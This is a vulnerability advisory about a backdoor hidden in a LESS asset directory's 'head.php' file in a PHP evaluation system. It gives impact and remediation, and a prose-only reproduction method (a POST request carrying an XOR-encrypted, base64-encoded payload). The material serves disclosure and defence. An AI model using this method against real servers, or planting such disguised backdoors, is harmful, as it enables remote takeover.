Conjure Position Department Service Quality Evaluation System Backdoor Vulnerability in head.php

A critical backdoor vulnerability has been identified in Conjure Position Department Service Quality Evaluation System versions through 1.0.11. The issue resides in the 'eval' function of the file 'public/assets/less/bootstrap-less/mixins/head.php'. This vulnerability allows remote code execution by manipulating the 'payload' argument, with the backdoor's presence disguised within a legitimate asset file.

Impact

Exploitation of this vulnerability leads to unauthorized remote code execution on the server, allowing attackers to execute arbitrary PHP commands. This backdoor is persistent across sessions and can be used to establish a command shell, effectively compromising the entire server.

Reproduction

The vulnerability can be reproduced by sending a POST request to 'public/assets/less/bootstrap-less/mixins/head.php' with an encrypted payload. The payload must be XOR-encrypted using a hardcoded key and base64-encoded before transmission. Once the backdoor is established, subsequent requests can execute stored or new commands, with all communication encrypted to evade detection.

Remediation

Users are advised to remove the malicious 'head.php' file and check for similar backdoors in other directories. Reviewing web server access logs for suspicious POST requests to this file is also recommended. Changing administrative passwords and API keys, invalidating active user sessions, and implementing long-term security measures such as a secure development lifecycle and regular penetration testing can help prevent future incidents.